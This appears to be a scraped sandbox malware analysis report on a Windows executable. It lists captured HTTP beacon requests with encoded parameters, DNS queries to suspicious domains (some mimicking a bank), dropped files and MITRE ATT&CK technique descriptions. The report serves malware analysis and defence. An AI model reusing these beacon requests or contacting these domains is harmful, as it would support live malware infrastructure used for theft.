Source: global traffic	HTTP traffic detected: GET /tma8/?1Dd0AZ=9LH/tkN2eceTuuLmYHB7mIhvDU5vHmoPFh9uxAKiqHzTpqc2ajrPE0tAvnDw6NiQ6KU66B+DrNfb3y4zDSs+kNVMrh75Qta+8woV1+WeDNzD8+w4KDRgOL1vrbyIBqcBZw==&-n1P=0hFdS6 HTTP/1.1Host: www.cs0724sd92jj.cloudAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Source: global traffic	HTTP traffic detected: GET /wouj/?1Dd0AZ=yWYB/R3wDrDMgv7/2h3mR36Svhbv8gHDqbTO7lKikOEauwAayMxscd89e9z4JUSFkkGyyfBsvTMtsJwN77reRgx2ev+oO3VaoDEPpI9NdXcV24A2tAPhqcySUcuIIvkh6g==&-n1P=0hFdS6 HTTP/1.1Host: www.clientebradesco.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Source: global traffic	HTTP traffic detected: GET /4qyv/?1Dd0AZ=YhEDIJyIBDBVYSqg/FaaSQqWMygBCOgWZYLNoJq+YB+tZNzGQAjy4s0gWfbYy8w7+pcTl2oQj4oxHqFf55zNmc3S9meoJwD5mOlZ7ywSk7a0PFA/uq20of9/npEWtw3ogQ==&-n1P=0hFdS6 HTTP/1.1Host: www.www00437.emailAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Source: global traffic	HTTP traffic detected: GET /rk2p/?-n1P=0hFdS6&1Dd0AZ=+pKvT+T6aI4mLrB8VovWrZ9aurXWw1oR3cjAxWZJwguM4Y26gXhm+92mk/Xvsm02xKxFuv5v6XNtx495ochGGgbX0HHEn//toJhu4nkHjRxJ0fg9XMahDIpubfdL/wf/HQ== HTTP/1.1Host: www.anthonyholland.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Source: global traffic	HTTP traffic detected: GET /nuiv/?1Dd0AZ=7su7kyuPS/KHUrSSGVu7suWxHYkjtEW9rejMc2pMopiQn27w9XMUnUBYAhg6Q3mcdodvpFC3LruuFA+cjx07AQKAGEKtxlRAoiigrCUyFvQ0T941BBkKKAOmk/5sJmea3Q==&-n1P=0hFdS6 HTTP/1.1Host: www.726075.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Source: global traffic	HTTP traffic detected: GET /ve3g/?1Dd0AZ=OTcOv8w+bCTLwtzbPVHaVBaVlmgm7BOGOBYyNnUD5x742Zgn72+Avt/ao6tsWGE5AAzMA+xeSHuleySgj3Ruc3Zh0Y3NGXhxV/AZkf+qXDjjwczoUoJ8qIseLUJpArAgGg==&-n1P=0hFdS6 HTTP/1.1Host: www.oxilo.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Source: global traffic	HTTP traffic detected: GET /mx00/?1Dd0AZ=qileVsN1diZFcCO3Qsw4YZf+VstA9OzPNQ7Oa8/FkrUJR0uYa1wUZggpoqScYraC15jy36uBsEEpRc6ILD1+pn39gh+i/JJWwEE6vnOCgWAwHzuRQDxiPAmp6FvDKEZlxA==&-n1P=0hFdS6 HTTP/1.1Host: www.farukugurluakdogan.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Source: global traffic	HTTP traffic detected: GET /ds60/?1Dd0AZ=NptoDuGSTmnkVeWAwrxyuzRQqKBWh8zew1/AQPUPJcat0lU6P0BeUWoCdZx3tRqkOQ6ojXgPGKinPOP1NyNwGTjSyc4ttB+G8hVuOCWpwy4v7vXDapYH466x6ojHnThYog==&-n1P=0hFdS6 HTTP/1.1Host: www.cy-nrg.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Source: global traffic	HTTP traffic detected: GET /ds60/?1Dd0AZ=NptoDuGSTmnkVeWAwrxyuzRQqKBWh8zew1/AQPUPJcat0lU6P0BeUWoCdZx3tRqkOQ6ojXgPGKinPOP1NyNwGTjSyc4ttB+G8hVuOCWpwy4v7vXDapYH466x6ojHnThYog==&-n1P=0hFdS6 HTTP/1.1Host: www.cy-nrg.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Source: global traffic	HTTP traffic detected: GET /1h9c/?1Dd0AZ=sOtnxD/yobNnegY8jaSsoAQmhivqqrJAOVcBiS67N8+hqBqB+i+1bOvJoDF03ArbwEkHPmpF5H+WU0CTxafZbPEDuWvRa8lUtMqL2ERE56je042ykjvM2v8hySrFvxy+1w==&-n1P=0hFdS6 HTTP/1.1Host: www.57ddu.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Source: global traffic	HTTP traffic detected: GET /hpj7/?-n1P=0hFdS6&1Dd0AZ=X5pkhncivmKNwc5IHzwKv2V+WlWG/NRpDmwvfoQjjuJNRlGXFXD+t3RxF1NKvRE2Xyic5AtQwV6vRmAQ2NBYpUrTbxGdn/5d8rnNk74oeipYn988AGhjCztrSCL7Uz3dwQ== HTTP/1.1Host: www.318st.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Source: global traffic	HTTP traffic detected: GET /tsl3/?1Dd0AZ=ff7Z98uvbm638VP3JcjmESh/VmNJU8ErJ1Yzz5lHVPQt2vZNZaCIxPyWwoBoOzoyhP3GiADwE1pXH5VsixDoB7IhtDmu8bTsHonITBjxr4DKmZq9BNE+ElxmWonvBi1Ayw==&-n1P=0hFdS6 HTTP/1.1Host: www.yjsdhy.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18

Source: global traffic	DNS traffic detected: DNS query: www.redimpact.online
Source: global traffic	DNS traffic detected: DNS query: www.personal-loans-jp8.xyz
Source: global traffic	DNS traffic detected: DNS query: www.pelus-pijama-pro.shop
Source: global traffic	DNS traffic detected: DNS query: www.cs0724sd92jj.cloud
Source: global traffic	DNS traffic detected: DNS query: www.clientebradesco.online
Source: global traffic	DNS traffic detected: DNS query: www.www00437.email
Source: global traffic	DNS traffic detected: DNS query: www.anthonyholland.net
Source: global traffic	DNS traffic detected: DNS query: www.726075.buzz
Source: global traffic	DNS traffic detected: DNS query: www.siyue.xyz
Source: global traffic	DNS traffic detected: DNS query: www.oxilo.info
Source: global traffic	DNS traffic detected: DNS query: www.farukugurluakdogan.xyz
Source: global traffic	DNS traffic detected: DNS query: www.cy-nrg.info
Source: global traffic	DNS traffic detected: DNS query: www.woshop.online
Source: global traffic	DNS traffic detected: DNS query: www.57ddu.top
Source: global traffic	DNS traffic detected: DNS query: www.318st.com
Source: global traffic	DNS traffic detected: DNS query: www.yjsdhy.top

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 3qsTcL9MOT.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3qsTcL9MOT.exe.log

C:\Users\user\AppData\Local\Temp\q3a81SS

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
3qsTcL9MOT.exe

Function 0147D371 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 149
threadCOMMON

Function 0147D380 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 079C72B4 Relevance: 1.7, APIs: 1, Instructions: 245
processCOMMON

Function 079C72C0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 0147B0E8 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Function 03351C91 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Function 03351CF0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Function 0147590C Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Function 03351284 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre